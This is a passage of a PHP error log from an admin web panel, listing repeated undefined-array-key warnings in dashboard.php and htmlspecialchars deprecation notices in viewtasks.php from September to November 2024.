Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 16:21:26 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 16:25:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 16:33:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 16:38:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 17:16:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 18:15:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 18:37:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 18:43:04 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 20:16:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 22:28:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 22:41:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 23:36:03 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 23:36:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 09:47:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 10:50:52 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 11:28:56 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:17:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:21:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:24:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:24:47 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:24:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:26:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:28:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:28:14 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:52:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 13:06:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 13:33:52 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 13:34:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 13:37:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 13:39:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 13:39:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 14:10:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 15:37:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 15:40:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 16:27:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 16:42:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 16:57:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Sep-2024 09:01:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Sep-2024 10:02:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Sep-2024 11:03:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Sep-2024 11:59:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Sep-2024 13:08:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Sep-2024 15:09:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 17:25:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 17:28:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 17:42:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 21:51:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 22:06:25 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 22:25:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 22:26:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 22:30:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 22:32:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 12:18:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 12:27:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 13:48:47 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 13:51:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 13:54:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 14:17:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 14:19:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 14:29:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 14:47:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 15:49:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 15:59:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 16:03:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 16:07:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 16:13:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 16:14:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 16:26:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Sep-2024 10:51:56 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Sep-2024 11:04:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Sep-2024 12:20:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Sep-2024 13:51:20 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Sep-2024 15:44:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Sep-2024 21:10:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Sep-2024 22:09:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 08:53:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 09:00:54 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 10:40:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 12:33:50 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 13:03:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 13:56:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 16:04:52 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 19:09:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 19:10:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 22:25:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 22:56:54 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 10:15:03 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 11:29:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 12:13:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 13:02:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 13:59:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 14:07:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 14:16:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 16:05:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 18:22:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Oct-2024 13:43:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Oct-2024 13:48:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Oct-2024 14:58:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Oct-2024 16:30:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Oct-2024 19:23:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Oct-2024 12:16:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Oct-2024 12:28:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Oct-2024 18:47:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Oct-2024 19:30:26 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Oct-2024 17:40:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Oct-2024 17:40:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 08:53:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 11:23:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 11:51:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 11:53:50 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 12:26:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 13:39:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 17:37:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 20:11:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Oct-2024 11:14:03 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Oct-2024 12:49:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Oct-2024 15:05:52 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Oct-2024 10:26:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Oct-2024 12:30:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Oct-2024 12:34:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Oct-2024 14:54:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Oct-2024 11:54:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Oct-2024 11:05:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Oct-2024 11:08:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Oct-2024 12:00:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Oct-2024 16:10:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Oct-2024 16:33:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Oct-2024 10:36:04 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Oct-2024 15:09:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Oct-2024 15:09:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Oct-2024 15:11:20 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Oct-2024 15:25:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Oct-2024 15:38:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Oct-2024 15:48:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Oct-2024 15:49:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Oct-2024 17:52:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Oct-2024 17:54:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Oct-2024 17:59:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Oct-2024 18:01:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Oct-2024 10:49:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Oct-2024 12:32:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 00:59:54 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 00:59:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 